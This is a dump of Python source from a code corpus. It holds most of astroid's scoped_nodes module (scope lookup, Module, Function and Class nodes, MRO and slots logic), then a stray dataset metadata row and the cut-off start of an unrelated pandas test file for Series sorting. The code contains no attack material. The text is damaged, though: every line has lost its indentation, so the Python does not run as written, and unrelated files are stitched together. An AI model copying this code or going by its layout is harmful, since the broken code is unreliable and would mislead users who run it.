module.class.name ...
"""
if self.parent is None:
return self.name
return '%s.%s' % (self.parent.frame().qname(), self.name)
def frame(self):
"""return the first parent frame node (i.e. Module, Function or Class)
"""
return self
def scope(self):
"""return the first node defining a new scope (i.e. Module,
Function, Class, Lambda but also GenExpr, DictComp and SetComp)
"""
return self
def _scope_lookup(self, node, name, offset=0):
"""XXX method for interfacing the scope lookup"""
try:
stmts = node._filter_stmts(self.locals[name], self, offset)
except KeyError:
stmts = ()
if stmts:
return self, stmts
if self.parent: # i.e. not Module
# nested scope: if parent scope is a function, that's fine
# else jump to the module
pscope = self.parent.scope()
if not pscope.is_function:
pscope = pscope.root()
return pscope.scope_lookup(node, name)
return builtin_lookup(name) # Module
def set_local(self, name, stmt):
"""define <name> in locals (<stmt> is the node defining the name)
if the node is a Module node (i.e. has globals), add the name to
globals
if the name is already defined, ignore it
"""
#assert not stmt in self.locals.get(name, ()), (self, stmt)
self.locals.setdefault(name, []).append(stmt)
__setitem__ = set_local
def _append_node(self, child):
"""append a child, linking it in the tree"""
self.body.append(child)
child.parent = self
def add_local_node(self, child_node, name=None):
"""append a child which should alter locals to the given node"""
if name != '__class__':
# add __class__ node as a child will cause infinite recursion later!
self._append_node(child_node)
self.set_local(name or child_node.name, child_node)
def __getitem__(self, item):
"""method from the `dict` interface returning the first node
associated with the given name in the locals dictionary
:type item: str
:param item: the name of the locally defined object
:raises KeyError: if the name is not defined
"""
return self.locals[item][0]
def __iter__(self):
"""method from the `dict` interface returning an iterator on
`self.keys()`
"""
return iter(self.keys())
def keys(self):
"""method from the `dict` interface returning a tuple containing
locally defined names
"""
return list(self.locals.keys())
def values(self):
"""method from the `dict` interface returning a tuple containing
locally defined nodes which are instance of `Function` or `Class`
"""
return [self[key] for key in self.keys()]
def items(self):
"""method from the `dict` interface returning a list of tuple
containing each locally defined name with its associated node,
which is an instance of `Function` or `Class`
"""
return list(zip(self.keys(), self.values()))
def __contains__(self, name):
return name in self.locals
has_key = __contains__
# Module #####################################################################
class Module(LocalsDictNodeNG):
_astroid_fields = ('body',)
fromlineno = 0
lineno = 0
# attributes below are set by the builder module or by raw factories
    # the file from which the astroid representation has been extracted. It may
# be None if the representation has been built from a built-in module
file = None
# Alternatively, if built from a string/bytes, this can be set
file_bytes = None
# encoding of python source file, so we can get unicode out of it (python2
# only)
file_encoding = None
# the module name
name = None
# boolean for astroid built from source (i.e. ast)
pure_python = None
# boolean for package module
package = None
# dictionary of globals with name as key and node defining the global
# as value
globals = None
# Future imports
future_imports = None
# names of python special attributes (handled by getattr impl.)
special_attributes = set(('__name__', '__doc__', '__file__', '__path__',
'__dict__'))
# names of module attributes available through the global scope
scope_attrs = set(('__name__', '__doc__', '__file__', '__path__'))
def __init__(self, name, doc, pure_python=True):
self.name = name
self.doc = doc
self.pure_python = pure_python
self.locals = self.globals = {}
self.body = []
self.future_imports = set()
def _get_stream(self):
if self.file_bytes is not None:
return BytesIO(self.file_bytes)
if self.file is not None:
stream = open(self.file, 'rb')
return stream
return None
@property
def file_stream(self):
        warnings.warn("file_stream property is deprecated and "
                      "it is slated for removal in astroid 1.6. "
"Use the new method 'stream' instead.",
PendingDeprecationWarning,
stacklevel=2)
return self._get_stream()
def stream(self):
"""Get a stream to the underlying file or bytes."""
return self._get_stream()
def close(self):
"""Close the underlying file streams."""
warnings.warn("close method is deprecated and it is "
"slated for removal in astroid 1.6, along "
"with 'file_stream' property. "
"Its behaviour is replaced by managing each "
"file stream returned by the 'stream' method.",
PendingDeprecationWarning,
stacklevel=2)
def block_range(self, lineno):
"""return block line numbers.
        start from the beginning regardless of the given lineno
"""
return self.fromlineno, self.tolineno
def scope_lookup(self, node, name, offset=0):
        if name in self.scope_attrs and name not in self.locals:
try:
return self, self.getattr(name)
except NotFoundError:
return self, ()
return self._scope_lookup(node, name, offset)
def pytype(self):
return '%s.module' % BUILTINS
def display_type(self):
return 'Module'
def getattr(self, name, context=None, ignore_locals=False):
if name in self.special_attributes:
if name == '__file__':
return [cf(self.file)] + self.locals.get(name, [])
if name == '__path__' and self.package:
return [List()] + self.locals.get(name, [])
return std_special_attributes(self, name)
if not ignore_locals and name in self.locals:
return self.locals[name]
if self.package:
try:
return [self.import_module(name, relative_only=True)]
except AstroidBuildingException:
raise NotFoundError(name)
except SyntaxError:
raise NotFoundError(name)
except Exception:# XXX pylint tests never pass here; do we need it?
import traceback
traceback.print_exc()
raise NotFoundError(name)
getattr = remove_nodes(getattr, DelName)
def igetattr(self, name, context=None):
"""inferred getattr"""
# set lookup name since this is necessary to infer on import nodes for
# instance
context = copy_context(context)
context.lookupname = name
try:
return _infer_stmts(self.getattr(name, context), context, frame=self)
except NotFoundError:
raise InferenceError(name)
def fully_defined(self):
"""return True if this module has been built from a .py file
and so contains a complete representation including the code
"""
return self.file is not None and self.file.endswith('.py')
def statement(self):
"""return the first parent node marked as statement node
consider a module as a statement...
"""
return self
def previous_sibling(self):
"""module has no sibling"""
return
def next_sibling(self):
"""module has no sibling"""
return
if sys.version_info < (2, 8):
@cachedproperty
def _absolute_import_activated(self):
for stmt in self.locals.get('absolute_import', ()):
if isinstance(stmt, From) and stmt.modname == '__future__':
return True
return False
else:
_absolute_import_activated = True
def absolute_import_activated(self):
return self._absolute_import_activated
def import_module(self, modname, relative_only=False, level=None):
"""import the given module considering self as context"""
if relative_only and level is None:
level = 0
absmodname = self.relative_to_absolute_name(modname, level)
try:
return MANAGER.ast_from_module_name(absmodname)
except AstroidBuildingException:
# we only want to import a sub module or package of this module,
# skip here
if relative_only:
raise
return MANAGER.ast_from_module_name(modname)
def relative_to_absolute_name(self, modname, level):
"""return the absolute module name for a relative import.
The relative import can be implicit or explicit.
"""
        # XXX this returns nonsense when called on an absolute import
# like 'pylint.checkers.astroid.utils'
# XXX doesn't return absolute name if self.name isn't absolute name
if self.absolute_import_activated() and level is None:
return modname
if level:
if self.package:
level = level - 1
package_name = self.name.rsplit('.', level)[0]
elif self.package:
package_name = self.name
else:
package_name = self.name.rsplit('.', 1)[0]
if package_name:
if not modname:
return package_name
return '%s.%s' % (package_name, modname)
return modname
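    # Illustrative behaviour (comment only, not part of the original source)
    # for explicit relative imports, i.e. when a level is given:
    #   on a plain module named 'pkg.sub.mod'
    #     relative_to_absolute_name('helpers', level=1) -> 'pkg.sub.helpers'
    #     relative_to_absolute_name('helpers', level=2) -> 'pkg.helpers'
    #   on the package 'pkg.sub' itself (self.package is True)
    #     relative_to_absolute_name('helpers', level=1) -> 'pkg.sub.helpers'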
def wildcard_import_names(self):
"""return the list of imported names when this module is 'wildcard
imported'
It doesn't include the '__builtins__' name which is added by the
current CPython implementation of wildcard imports.
"""
# take advantage of a living module if it exists
try:
living = sys.modules[self.name]
except KeyError:
pass
else:
try:
return living.__all__
except AttributeError:
return [name for name in living.__dict__.keys()
if not name.startswith('_')]
# else lookup the astroid
#
# We separate the different steps of lookup in try/excepts
# to avoid catching too many Exceptions
default = [name for name in self.keys() if not name.startswith('_')]
try:
all = self['__all__']
except KeyError:
return default
try:
explicit = next(all.assigned_stmts())
except InferenceError:
return default
except AttributeError:
# not an assignment node
# XXX infer?
return default
# Try our best to detect the exported name.
infered = []
try:
explicit = next(explicit.infer())
except InferenceError:
return default
if not isinstance(explicit, (Tuple, List)):
return default
str_const = lambda node: (isinstance(node, Const) and
isinstance(node.value, six.string_types))
for node in explicit.elts:
if str_const(node):
infered.append(node.value)
else:
try:
infered_node = next(node.infer())
except InferenceError:
continue
if str_const(infered_node):
infered.append(infered_node.value)
return infered
class ComprehensionScope(LocalsDictNodeNG):
def frame(self):
return self.parent.frame()
scope_lookup = LocalsDictNodeNG._scope_lookup
class GenExpr(ComprehensionScope):
_astroid_fields = ('elt', 'generators')
def __init__(self):
self.locals = {}
self.elt = None
self.generators = []
class DictComp(ComprehensionScope):
_astroid_fields = ('key', 'value', 'generators')
def __init__(self):
self.locals = {}
self.key = None
self.value = None
self.generators = []
class SetComp(ComprehensionScope):
_astroid_fields = ('elt', 'generators')
def __init__(self):
self.locals = {}
self.elt = None
self.generators = []
class _ListComp(NodeNG):
"""class representing a ListComp node"""
_astroid_fields = ('elt', 'generators')
elt = None
generators = None
if sys.version_info >= (3, 0):
class ListComp(_ListComp, ComprehensionScope):
"""class representing a ListComp node"""
def __init__(self):
self.locals = {}
else:
class ListComp(_ListComp):
"""class representing a ListComp node"""
# Function ###################################################################
def _infer_decorator_callchain(node):
"""Detect decorator call chaining and see if the end result is a
static or a classmethod.
"""
if not isinstance(node, Function):
return
if not node.parent:
return
try:
# TODO: We don't handle multiple inference results right now,
# because there's no flow to reason when the return
# is what we are looking for, a static or a class method.
result = next(node.infer_call_result(node.parent))
except (StopIteration, InferenceError):
return
if isinstance(result, Instance):
result = result._proxied
if isinstance(result, Class):
if result.is_subtype_of('%s.classmethod' % BUILTINS):
return 'classmethod'
if result.is_subtype_of('%s.staticmethod' % BUILTINS):
return 'staticmethod'
def _function_type(self):
"""
Function type, possible values are:
method, function, staticmethod, classmethod.
"""
# Can't infer that this node is decorated
# with a subclass of `classmethod` where `type` is first set,
# so do it here.
if self.decorators:
for node in self.decorators.nodes:
if isinstance(node, CallFunc):
# Handle the following case:
# @some_decorator(arg1, arg2)
# def func(...)
#
try:
current = next(node.func.infer())
except InferenceError:
continue
_type = _infer_decorator_callchain(current)
if _type is not None:
return _type
try:
for infered in node.infer():
# Check to see if this returns a static or a class method.
_type = _infer_decorator_callchain(infered)
if _type is not None:
return _type
if not isinstance(infered, Class):
continue
for ancestor in infered.ancestors():
if not isinstance(ancestor, Class):
continue
if ancestor.is_subtype_of('%s.classmethod' % BUILTINS):
return 'classmethod'
elif ancestor.is_subtype_of('%s.staticmethod' % BUILTINS):
return 'staticmethod'
except InferenceError:
pass
return self._type
class Lambda(LocalsDictNodeNG, FilterStmtsMixin):
_astroid_fields = ('args', 'body',)
name = '<lambda>'
# function's type, 'function' | 'method' | 'staticmethod' | 'classmethod'
type = 'function'
def __init__(self):
self.locals = {}
self.args = []
self.body = []
def pytype(self):
if 'method' in self.type:
return '%s.instancemethod' % BUILTINS
return '%s.function' % BUILTINS
def display_type(self):
if 'method' in self.type:
return 'Method'
return 'Function'
def callable(self):
return True
def argnames(self):
"""return a list of argument names"""
if self.args.args: # maybe None with builtin functions
names = _rec_get_names(self.args.args)
else:
names = []
if self.args.vararg:
names.append(self.args.vararg)
if self.args.kwarg:
names.append(self.args.kwarg)
return names
def infer_call_result(self, caller, context=None):
"""infer what a function is returning when called"""
return self.body.infer(context)
def scope_lookup(self, node, name, offset=0):
if node in self.args.defaults or node in self.args.kw_defaults:
frame = self.parent.frame()
# line offset to avoid that def func(f=func) resolve the default
# value to the defined function
offset = -1
else:
# check this is not used in function decorators
frame = self
return frame._scope_lookup(node, name, offset)
class Function(Statement, Lambda):
if PY3K:
_astroid_fields = ('decorators', 'args', 'body', 'returns')
returns = None
else:
_astroid_fields = ('decorators', 'args', 'body')
special_attributes = set(('__name__', '__doc__', '__dict__'))
is_function = True
# attributes below are set by the builder module or by raw factories
blockstart_tolineno = None
decorators = None
_type = "function"
type = cachedproperty(_function_type)
def __init__(self, name, doc):
self.locals = {}
self.args = []
self.body = []
self.name = name
self.doc = doc
self.extra_decorators = []
self.instance_attrs = {}
@cachedproperty
def fromlineno(self):
# lineno is the line number of the first decorator, we want the def
# statement lineno
lineno = self.lineno
if self.decorators is not None:
lineno += sum(node.tolineno - node.lineno + 1
for node in self.decorators.nodes)
return lineno
@cachedproperty
def blockstart_tolineno(self):
return self.args.tolineno
def block_range(self, lineno):
"""return block line numbers.
        start from the "def" position regardless of the given lineno
"""
return self.fromlineno, self.tolineno
def getattr(self, name, context=None):
"""this method doesn't look in the instance_attrs dictionary since it's
done by an Instance proxy at inference time.
"""
if name == '__module__':
return [cf(self.root().qname())]
if name in self.instance_attrs:
return self.instance_attrs[name]
return std_special_attributes(self, name, False)
def is_method(self):
"""return true if the function node should be considered as a method"""
# check we are defined in a Class, because this is usually expected
# (e.g. pylint...) when is_method() return True
return self.type != 'function' and isinstance(self.parent.frame(), Class)
def decoratornames(self):
"""return a list of decorator qualified names"""
result = set()
decoratornodes = []
if self.decorators is not None:
decoratornodes += self.decorators.nodes
decoratornodes += self.extra_decorators
for decnode in decoratornodes:
for infnode in decnode.infer():
result.add(infnode.qname())
return result
decoratornames = cached(decoratornames)
def is_bound(self):
"""return true if the function is bound to an Instance or a class"""
return self.type == 'classmethod'
def is_abstract(self, pass_is_abstract=True):
"""Returns True if the method is abstract.
A method is considered abstract if
- the only statement is 'raise NotImplementedError', or
- the only statement is 'pass' and pass_is_abstract is True, or
         - the method is annotated with abc.abstractproperty/abc.abstractmethod
"""
if self.decorators:
for node in self.decorators.nodes:
try:
infered = next(node.infer())
except InferenceError:
continue
if infered and infered.qname() in ('abc.abstractproperty',
'abc.abstractmethod'):
return True
for child_node in self.body:
if isinstance(child_node, Raise):
if child_node.raises_not_implemented():
return True
if pass_is_abstract and isinstance(child_node, Pass):
return True
return False
# empty function is the same as function with a single "pass" statement
if pass_is_abstract:
return True
def is_generator(self):
"""return true if this is a generator function"""
# XXX should be flagged, not computed
return next(self.nodes_of_class((Yield, YieldFrom),
skip_klass=(Function, Lambda)), False)
def infer_call_result(self, caller, context=None):
"""infer what a function is returning when called"""
if self.is_generator():
yield Generator()
return
# This is really a gigantic hack to work around metaclass generators
# that return transient class-generating functions. Pylint's AST structure
# cannot handle a base class object that is only used for calling __new__,
# but does not contribute to the inheritance structure itself. We inject
# a fake class into the hierarchy here for several well-known metaclass
# generators, and filter it out later.
if (self.name == 'with_metaclass' and
len(self.args.args) == 1 and
self.args.vararg is not None):
metaclass = next(caller.args[0].infer(context))
if isinstance(metaclass, Class):
c = Class('temporary_class', None)
c.hide = True
c.parent = self
bases = [next(b.infer(context)) for b in caller.args[1:]]
c.bases = [base for base in bases if base != YES]
c._metaclass = metaclass
yield c
return
returns = self.nodes_of_class(Return, skip_klass=Function)
for returnnode in returns:
if returnnode.value is None:
yield Const(None)
else:
try:
for infered in returnnode.value.infer(context):
yield infered
except InferenceError:
yield YES
def _rec_get_names(args, names=None):
"""return a list of all argument names"""
if names is None:
names = []
for arg in args:
if isinstance(arg, Tuple):
_rec_get_names(arg.elts, names)
else:
names.append(arg.name)
return names
# Class ######################################################################
def _is_metaclass(klass, seen=None):
    """ Return True if the given class can be
used as a metaclass.
"""
if klass.name == 'type':
return True
if seen is None:
seen = set()
for base in klass.bases:
try:
for baseobj in base.infer():
if baseobj in seen:
continue
else:
seen.add(baseobj)
if isinstance(baseobj, Instance):
# not abstract
return False
if baseobj is YES:
continue
if baseobj is klass:
continue
if not isinstance(baseobj, Class):
continue
if baseobj._type == 'metaclass':
return True
if _is_metaclass(baseobj, seen):
return True
except InferenceError:
continue
return False
def _class_type(klass, ancestors=None):
    """return a Class node type to distinguish metaclass, interface and
    exception classes from 'regular' classes
"""
    # XXX we have to store ancestors in case we have an ancestor loop
if klass._type is not None:
return klass._type
if _is_metaclass(klass):
klass._type = 'metaclass'
elif klass.name.endswith('Interface'):
klass._type = 'interface'
elif klass.name.endswith('Exception'):
klass._type = 'exception'
else:
if ancestors is None:
ancestors = set()
if klass in ancestors:
# XXX we are in loop ancestors, and have found no type
klass._type = 'class'
return 'class'
ancestors.add(klass)
for base in klass.ancestors(recurs=False):
name = _class_type(base, ancestors)
if name != 'class':
if name == 'metaclass' and not _is_metaclass(klass):
# don't propagate it if the current class
# can't be a metaclass
continue
klass._type = base.type
break
if klass._type is None:
klass._type = 'class'
return klass._type
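# Illustrative outcomes (comment only, not part of the original astroid code):
#   - a class whose name ends with 'Interface' is typed 'interface'
#   - a class whose name ends with 'Exception', or which inherits from a base
#     already typed 'exception', is typed 'exception'
#   - a class deriving (possibly indirectly) from 'type' is detected by
#     _is_metaclass() and typed 'metaclass'; anything else falls back to 'class'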
def _iface_hdlr(iface_node):
"""a handler function used by interfaces to handle suspicious
interface nodes
"""
return True
class Class(Statement, LocalsDictNodeNG, FilterStmtsMixin):
# some of the attributes below are set by the builder module or
# by a raw factories
# a dictionary of class instances attributes
_astroid_fields = ('decorators', 'bases', 'body') # name
decorators = None
special_attributes = set(('__name__', '__doc__', '__dict__', '__module__',
'__bases__', '__mro__', '__subclasses__'))
blockstart_tolineno = None
_type = None
_metaclass_hack = False
hide = False
type = property(_class_type,
doc="class'type, possible values are 'class' | "
"'metaclass' | 'interface' | 'exception'")
def __init__(self, name, doc):
self.instance_attrs = {}
self.locals = {}
self.bases = []
self.body = []
self.name = name
self.doc = doc
def _newstyle_impl(self, context=None):
if context is None:
context = InferenceContext()
if self._newstyle is not None:
return self._newstyle
for base in self.ancestors(recurs=False, context=context):
if base._newstyle_impl(context):
self._newstyle = True
break
klass = self._explicit_metaclass()
# could be any callable, we'd need to infer the result of klass(name,
# bases, dict). punt if it's not a class node.
if klass is not None and isinstance(klass, Class):
self._newstyle = klass._newstyle_impl(context)
if self._newstyle is None:
self._newstyle = False
return self._newstyle
_newstyle = None
newstyle = property(_newstyle_impl,
doc="boolean indicating if it's a new style class"
"or not")
@cachedproperty
def blockstart_tolineno(self):
if self.bases:
return self.bases[-1].tolineno
else:
return self.fromlineno
def block_range(self, lineno):
"""return block line numbers.
        start from the "class" position regardless of the given lineno
"""
return self.fromlineno, self.tolineno
def pytype(self):
if self.newstyle:
return '%s.type' % BUILTINS
return '%s.classobj' % BUILTINS
def display_type(self):
return 'Class'
def callable(self):
return True
def is_subtype_of(self, type_name, context=None):
if self.qname() == type_name:
return True
for anc in self.ancestors(context=context):
if anc.qname() == type_name:
return True
def infer_call_result(self, caller, context=None):
"""infer what a class is returning when called"""
if self.is_subtype_of('%s.type' % (BUILTINS,), context) and len(caller.args) == 3:
name_node = next(caller.args[0].infer(context))
if (isinstance(name_node, Const) and
isinstance(name_node.value, six.string_types)):
name = name_node.value
else:
yield YES
return
result = Class(name, None)
bases = next(caller.args[1].infer(context))
if isinstance(bases, (Tuple, List)):
result.bases = bases.itered()
else:
# There is currently no AST node that can represent an 'unknown'
# node (YES is not an AST node), therefore we simply return YES here
# although we know at least the name of the class.
yield YES
return
result.parent = caller.parent
yield result
else:
yield Instance(self)
def scope_lookup(self, node, name, offset=0):
if any(node == base or base.parent_of(node)
for base in self.bases):
# Handle the case where we have either a name
# in the bases of a class, which exists before
# the actual definition or the case where we have
# a Getattr node, with that name.
#
# name = ...
# class A(name):
# def name(self): ...
#
# import name
# class A(name.Name):
# def name(self): ...
frame = self.parent.frame()
# line offset to avoid that class A(A) resolve the ancestor to
# the defined class
offset = -1
else:
frame = self
return frame._scope_lookup(node, name, offset)
# list of parent class as a list of string (i.e. names as they appear
# in the class definition) XXX bw compat
def basenames(self):
return [bnode.as_string() for bnode in self.bases]
basenames = property(basenames)
def ancestors(self, recurs=True, context=None):
"""return an iterator on the node base classes in a prefixed
depth first order
:param recurs:
boolean indicating if it should recurse or return direct
ancestors only
"""
# FIXME: should be possible to choose the resolution order
        # FIXME: inference makes infinite loops possible here
yielded = set([self])
if context is None:
context = InferenceContext()
if sys.version_info[0] >= 3:
if not self.bases and self.qname() != 'builtins.object':
yield builtin_lookup("object")[1][0]
return
for stmt in self.bases:
with context.restore_path():
try:
for baseobj in stmt.infer(context):
if not isinstance(baseobj, Class):
if isinstance(baseobj, Instance):
baseobj = baseobj._proxied
else:
# duh ?
continue
if not baseobj.hide:
if baseobj in yielded:
continue # cf xxx above
yielded.add(baseobj)
yield baseobj
if recurs:
for grandpa in baseobj.ancestors(recurs=True,
context=context):
if grandpa is self:
# This class is the ancestor of itself.
break
if grandpa in yielded:
continue # cf xxx above
yielded.add(grandpa)
yield grandpa
except InferenceError:
# XXX log error ?
continue
def local_attr_ancestors(self, name, context=None):
"""return an iterator on astroid representation of parent classes
which have <name> defined in their locals
"""
for astroid in self.ancestors(context=context):
if name in astroid:
yield astroid
def instance_attr_ancestors(self, name, context=None):
"""return an iterator on astroid representation of parent classes
which have <name> defined in their instance attribute dictionary
"""
for astroid in self.ancestors(context=context):
if name in astroid.instance_attrs:
yield astroid
def has_base(self, node):
return node in self.bases
    def local_attr(self, name, context=None):
        """return the list of assign nodes associated with name in this class
locals or in its parents
:raises `NotFoundError`:
          if no attribute with this name has been found in this class or
its parent classes
"""
try:
return self.locals[name]
except KeyError:
            # get it from the first parent implementing it, if any
for class_node in self.local_attr_ancestors(name, context):
return class_node.locals[name]
raise NotFoundError(name)
local_attr = remove_nodes(local_attr, DelAttr)
    def instance_attr(self, name, context=None):
        """return the astroid nodes associated with name in this class instance
attributes dictionary and in its parents
:raises `NotFoundError`:
          if no attribute with this name has been found in this class or
its parent classes
"""
# Return a copy, so we don't modify self.instance_attrs,
# which could lead to infinite loop.
values = list(self.instance_attrs.get(name, []))
# get all values from parents
for class_node in self.instance_attr_ancestors(name, context):
values += class_node.instance_attrs[name]
if not values:
raise NotFoundError(name)
return values
instance_attr = remove_nodes(instance_attr, DelAttr)
def instanciate_class(self):
"""return Instance of Class node, else return self"""
return Instance(self)
def getattr(self, name, context=None):
"""this method doesn't look in the instance_attrs dictionary since it's
done by an Instance proxy at inference time.
It may return a YES object if the attribute has not been actually
found but a __getattr__ or __getattribute__ method is defined
"""
values = self.locals.get(name, [])
if name in self.special_attributes:
if name == '__module__':
return [cf(self.root().qname())] + values
# FIXME: do we really need the actual list of ancestors?
# returning [Tuple()] + values don't break any test
# this is ticket http://www.logilab.org/ticket/52785
# XXX need proper meta class handling + MRO implementation
if name == '__bases__' or (name == '__mro__' and self.newstyle):
node = Tuple()
node.items = self.ancestors(recurs=True, context=context)
return [node] + values
return std_special_attributes(self, name)
# don't modify the list in self.locals!
values = list(values)
for classnode in self.ancestors(recurs=True, context=context):
values += classnode.locals.get(name, [])
if not values:
raise NotFoundError(name)
return values
def igetattr(self, name, context=None):
"""inferred getattr, need special treatment in class to handle
descriptors
"""
# set lookup name since this is necessary to infer on import nodes for
# instance
context = copy_context(context)
context.lookupname = name
try:
for infered in _infer_stmts(self.getattr(name, context), context,
frame=self):
# yield YES object instead of descriptors when necessary
if not isinstance(infered, Const) and isinstance(infered, Instance):
try:
infered._proxied.getattr('__get__', context)
except NotFoundError:
yield infered
else:
yield YES
else:
yield function_to_method(infered, self)
except NotFoundError:
if not name.startswith('__') and self.has_dynamic_getattr(context):
# class handle some dynamic attributes, return a YES object
yield YES
else:
raise InferenceError(name)
def has_dynamic_getattr(self, context=None):
"""return True if the class has a custom __getattr__ or
__getattribute__ method
"""
# need to explicitly handle optparse.Values (setattr is not detected)
if self.name == 'Values' and self.root().name == 'optparse':
return True
try:
self.getattr('__getattr__', context)
return True
except NotFoundError:
#if self.newstyle: XXX cause an infinite recursion error
try:
getattribute = self.getattr('__getattribute__', context)[0]
if getattribute.root().name != BUILTINS:
# class has a custom __getattribute__ defined
return True
except NotFoundError:
pass
return False
def methods(self):
"""return an iterator on all methods defined in the class and
its ancestors
"""
done = {}
for astroid in chain(iter((self,)), self.ancestors()):
for meth in astroid.mymethods():
if meth.name in done:
continue
done[meth.name] = None
yield meth
def mymethods(self):
"""return an iterator on all methods defined in the class"""
for member in self.values():
if isinstance(member, Function):
yield member
def interfaces(self, herited=True, handler_func=_iface_hdlr):
"""return an iterator on interfaces implemented by the given
class node
"""
# FIXME: what if __implements__ = (MyIFace, MyParent.__implements__)...
try:
implements = Instance(self).getattr('__implements__')[0]
except NotFoundError:
return
if not herited and not implements.frame() is self:
return
found = set()
missing = False
for iface in unpack_infer(implements):
if iface is YES:
missing = True
continue
if not iface in found and handler_func(iface):
found.add(iface)
yield iface
if missing:
raise InferenceError()
_metaclass = None
    def _explicit_metaclass(self):
        """ Return the explicitly defined metaclass
        for the current class.
        An explicitly defined metaclass is defined
either by passing the ``metaclass`` keyword argument
in the class definition line (Python 3) or (Python 2) by
having a ``__metaclass__`` class attribute, or if there are
no explicit bases but there is a global ``__metaclass__`` variable.
"""
for base in self.bases:
try:
for baseobj in base.infer():
if isinstance(baseobj, Class) and baseobj.hide:
self._metaclass = baseobj._metaclass
self._metaclass_hack = True
break
except InferenceError:
pass
if self._metaclass:
# Expects this from Py3k TreeRebuilder
try:
return next(node for node in self._metaclass.infer()
if node is not YES)
except (InferenceError, StopIteration):
return None
if sys.version_info >= (3, ):
return None
if '__metaclass__' in self.locals:
assignment = self.locals['__metaclass__'][-1]
elif self.bases:
return None
elif '__metaclass__' in self.root().locals:
assignments = [ass for ass in self.root().locals['__metaclass__']
if ass.lineno < self.lineno]
if not assignments:
return None
assignment = assignments[-1]
else:
return None
try:
infered = next(assignment.infer())
except InferenceError:
return
if infered is YES: # don't expose this
return None
return infered
def metaclass(self):
""" Return the metaclass of this class.
If this class does not define explicitly a metaclass,
then the first defined metaclass in ancestors will be used
instead.
"""
klass = self._explicit_metaclass()
if klass is None:
for parent in self.ancestors():
klass = parent.metaclass()
if klass is not None:
break
return klass
def has_metaclass_hack(self):
return self._metaclass_hack
def _islots(self):
""" Return an iterator with the inferred slots. """
if '__slots__' not in self.locals:
return
for slots in self.igetattr('__slots__'):
# check if __slots__ is a valid type
for meth in ITER_METHODS:
try:
slots.getattr(meth)
break
except NotFoundError:
continue
else:
continue
if isinstance(slots, Const):
# a string. Ignore the following checks,
# but yield the node, only if it has a value
if slots.value:
yield slots
continue
if not hasattr(slots, 'itered'):
# we can't obtain the values, maybe a .deque?
continue
if isinstance(slots, Dict):
values = [item[0] for item in slots.items]
else:
values = slots.itered()
if values is YES:
continue
for elt in values:
try:
for infered in elt.infer():
if infered is YES:
continue
if (not isinstance(infered, Const) or
not isinstance(infered.value,
six.string_types)):
continue
if not infered.value:
continue
yield infered
except InferenceError:
continue
# Cached, because inferring them all the time is expensive
@cached
def slots(self):
"""Get all the slots for this node.
        If the class doesn't define any slots through the `__slots__`
        variable, then this function will return None.
        Also, it will return None if the slots weren't inferred.
Otherwise, it will return a list of slot names.
"""
if not self.newstyle:
raise NotImplementedError(
"The concept of slots is undefined for old-style classes.")
slots = self._islots()
try:
first = next(slots)
except StopIteration:
# The class doesn't have a __slots__ definition.
return None
return [first] + list(slots)
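    # Illustrative sketch (comment only, not part of the original astroid
    # code): for a new-style class built from
    #     class Point(object):
    #         __slots__ = ('x', 'y')
    # slots() returns the two inferred Const nodes, i.e.
    #     [s.value for s in point_node.slots()] == ['x', 'y']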
def _inferred_bases(self, recurs=True, context=None):
# TODO(cpopa): really similar with .ancestors,
# but the difference is when one base is inferred,
# only the first object is wanted. That's because
# we aren't interested in superclasses, as in the following
# example:
#
# class SomeSuperClass(object): pass
# class SomeClass(SomeSuperClass): pass
# class Test(SomeClass): pass
#
# Inferring SomeClass from the Test's bases will give
# us both SomeClass and SomeSuperClass, but we are interested
# only in SomeClass.
if context is None:
context = InferenceContext()
if sys.version_info[0] >= 3:
if not self.bases and self.qname() != 'builtins.object':
yield builtin_lookup("object")[1][0]
return
for stmt in self.bases:
try:
baseobj = next(stmt.infer(context=context))
except InferenceError:
# XXX log error ?
continue
if isinstance(baseobj, Instance):
baseobj = baseobj._proxied
if not isinstance(baseobj, Class):
continue
if not baseobj.hide:
yield baseobj
def mro(self, context=None):
"""Get the method resolution order, using C3 linearization.
It returns the list of ancestors sorted by the mro.
This will raise `NotImplementedError` for old-style classes, since
they don't have the concept of MRO.
"""
if not self.newstyle:
raise NotImplementedError(
"Could not obtain mro for old-style classes.")
bases = list(self._inferred_bases(context=context))
unmerged_mro = ([[self]] +
[base.mro() for base in bases if base is not self] +
[bases])
_verify_duplicates_mro(unmerged_mro)
return _c3_merge(unmerged_mro)
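    # Illustrative sketch (comment only, not part of the original astroid
    # code): for the classic diamond
    #     class A(object): pass
    #     class B(A): pass
    #     class C(A): pass
    #     class D(B, C): pass
    # the Class node built for D linearizes, as CPython would, to
    #     [cls.name for cls in d_node.mro()] == ['D', 'B', 'C', 'A', 'object']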
| lgpl-3.0 | -3,886,903,257,581,166,000 | 34.592992 | 90 | 0.558368 | false |
harisbal/pandas | pandas/tests/series/test_sorting.py | 2 | 9605 | # coding=utf-8
import random
import numpy as np
import pytest
from pandas import Categorical, DataFrame, IntervalIndex, MultiIndex, Series
import pandas.util.testing as tm
from pandas.util.testing import assert_almost_equal, assert_series_equal
from .common import TestData
class TestSeriesSorting(TestData):
def test_sort_values(self):
# check indexes are reordered corresponding with the values
ser = Series([3, 2, 4, 1], ['A', 'B', 'C', 'D'])
expected = Series([1, 2, 3, 4], ['D', 'B', 'A', 'C'])
result = ser.sort_values()
tm.assert_series_equal(expected, result)
ts = self.ts.copy()
ts[:5] = np.NaN
vals = ts.values
result = ts.sort_values()
assert np.isnan(result[-5:]).all()
tm.assert_numpy_array_equal(result[:-5].values, np.sort(vals[5:]))
# na_position
result = ts.sort_values(na_position='first')
assert np.isnan(result[:5]).all()
tm.assert_numpy_array_equal(result[5:].values, np.sort(vals[5:]))
# something object-type
ser = Series(['A', 'B'], [1, 2])
# no failure
ser.sort_values()
# ascending=False
ordered = ts.sort_values(ascending=False)
expected = np.sort(ts.dropna().values)[::-1]
assert_almost_equal(expected, ordered.dropna().values)
ordered = ts.sort_values(ascending=False, na_position='first')
assert_almost_equal(expected, ordered.dropna().values)
# ascending=[False] should behave the same as ascending=False
ordered = ts.sort_values(ascending=[False])
expected = ts.sort_values(ascending=False)
assert_series_equal(expected, ordered)
ordered = ts.sort_values(ascending=[False], na_position='first')
expected = ts.sort_values(ascending=False, na_position='first')
assert_series_equal(expected, ordered)
pytest.raises(ValueError,
lambda: ts.sort_values(ascending=None))
pytest.raises(ValueError,
lambda: ts.sort_values(ascending=[]))
pytest.raises(ValueError,
lambda: ts.sort_values(ascending=[1, 2, 3]))
pytest.raises(ValueError,
lambda: ts.sort_values(ascending=[False, False]))
